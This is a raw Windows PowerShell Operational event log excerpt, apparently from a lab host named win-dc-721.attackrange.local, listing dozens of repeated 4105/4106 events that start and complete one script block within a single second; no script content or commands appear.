SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470402
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470401
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470400
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470399
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470398
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470397
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470396
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470395
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470394
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470393
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470392
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470391
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470390
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470389
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470388
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470387
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470386
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470385
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470384
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470383
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470382
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470381
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470380
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470379
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470378
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470377
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470376
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470375
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470374
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470373
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470372
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470371
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470370
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470369
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470368
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470367
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470366
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470365
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470364
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470363
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470362
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470361
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470360
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470359
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470358
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470357
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470356
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470355
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470354
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470353
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470352
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470351
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470350
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1470349
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1470348
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
